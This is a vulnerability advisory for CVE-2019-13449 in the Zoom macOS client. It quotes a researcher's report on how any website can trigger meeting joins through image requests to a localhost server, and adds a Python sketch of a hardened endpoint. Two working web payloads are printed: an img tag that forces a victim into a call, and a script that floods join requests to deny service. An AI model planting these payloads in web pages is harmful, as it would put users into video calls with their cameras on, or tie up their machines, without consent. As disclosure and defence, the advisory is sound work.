Zoom Client before 4.4.2 Improper Input Validation Vulnerability

Summary

In the Zoom Client before 4.4.2 on macOS, remote attackers can cause a denial of service (continual focus grabs) via a sequence of invalid launch?action=join&confno= requests to localhost port 19421.

Credit:

The information has been provided by Jonathan Leitschuh

The original article can be found at:

https://bugs.chromium.org/p/chromium/issues/detail?id=951540

Details

Chrome allows CORS bypass on image requests made against localhost

This was originally discovered while researching a security vulnerability in a very popular piece of video conferencing software (similar to Skype for Business or Google Hangouts).

The infrastructure of this video conferencing software allows a user to send meeting invites as links to participants.
When participants click the link, it is opened in their browser and the browser is able to launch the user into a video call by opening the company's software on their local machine.
This process only requires the user to have installed the software on their computer; there's no need for the user to have installed an external Chrome plugin.

I was curious about how this process worked, so I began exploring the JavaScript that executes in the browser that enables this to happen.

What I found was that the JavaScript on the company's site makes an HTTP GET request for an image to the following URL:

http://localhost:19421/launch?action=join&confno=[some conference number]

The reason that the JavaScript loads an image instead of making an XMLHttpRequest is because Chrome blocks CORS requests against localhost.
Related:
https://bugs.chromium.org/p/chromium/issues/detail?id=67743

In order to bypass this protection, the company instead used the loading of an image.

The screenshot attached shows the pseudo-case-switch statement they use to convey information from the localhost server to the JavaScript running in the browser.
The dimensions of the image returned by the GET request are used by the JavaScript to determine the success/failure of the web server's ability to join the user to the call.
For example, a 1×1 image response indicates a success.

This vulnerability can be abused to forcibly join someone to a video call using the following HTML:

<img src="http://localhost:19421/launch?action=join&confno=577781437"/>

Using this vulnerability, any website can effectively DoS a user's machine with the following HTML:

<body>
<script>
var attackNumber = "614249281";

setInterval(function(){
console.log("Fired");
var image = document.createElement("img");
// Use a date to bust the browser's cache
var date = new Date();
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
document.body.appendChild(image);
}, 1);

</script>
</body>

Using the vulnerability described above, a malicious attacker is able to forcibly join anyone with the vulnerable software installed (a majority of users) into a video call with their camera active by default. No user interaction required besides navigating to an impacted site.

It's important to note that the company with the impacted software has over 650,000 business customers and over 85% of the top 200 US universities. As of 2015, they had over 35 million active users.
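As an added illustration (not Zoom's code, and not part of the report above), the following decision function shows how a localhost listener for the launch?action=join request could defend against the flood described: it validates confno, checks the Referer of the image request against an allow-list, and refuses repeated joins inside a cool-down window, signalling the result through the image dimensions the report describes. The class name, the allow-listed origin, the cool-down value and the rejection dimensions are assumptions.

```python
"""Illustrative hardening of the localhost launch endpoint (assumed design, not Zoom's code)."""
from urllib.parse import urlparse, parse_qs
import time

ALLOWED_REFERERS = {"https://zoom.us"}   # assumption: only the vendor's own site may trigger a join
MIN_SECONDS_BETWEEN_JOINS = 5.0          # assumption: defeats the 1 ms setInterval flood
SUCCESS_DIMS = (1, 1)                    # the report says a 1x1 image signals success
REJECTED_DIMS = (2, 2)                   # assumed dimension for "request refused"


def vulnerable_decision(request_target, headers):
    """The behaviour the report describes: any origin, any rate, always joins."""
    qs = parse_qs(urlparse(request_target).query)
    return (True, "joined", SUCCESS_DIMS) if qs.get("action") == ["join"] else (False, "unknown", REJECTED_DIMS)


class JoinGuard:
    """Decides one GET /launch request; returns (allowed, reason, image_dims)."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._last_join = None

    def check(self, request_target, headers):
        url = urlparse(request_target)
        qs = parse_qs(url.query)
        if url.path != "/launch" or qs.get("action") != ["join"]:
            return False, "unknown action", REJECTED_DIMS
        confno = qs.get("confno", [""])[0]
        if not confno.isdigit():
            return False, "confno must be numeric", REJECTED_DIMS
        # An <img> load carries no Origin header, so the Referer is the only origin hint.
        # Referrer policies can suppress it, so this is defence in depth, not authentication;
        # a real fix also needs explicit user consent inside the client before joining.
        ref = urlparse(headers.get("Referer", ""))
        if f"{ref.scheme}://{ref.hostname}" not in ALLOWED_REFERERS:
            return False, "referer not allow-listed", REJECTED_DIMS
        # Cool-down: a burst of image requests must not keep re-grabbing focus.
        now = self._clock()
        if self._last_join is not None and now - self._last_join < MIN_SECONDS_BETWEEN_JOINS:
            return False, "rate limited", REJECTED_DIMS
        self._last_join = now
        return True, "joined", SUCCESS_DIMS
```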

Vulnerable Systems:

Zoom Client before 4.4.2 on macOS

CVE Information:

CVE-2019-13449

Disclosure Timeline:
Published Date: 07/16/2019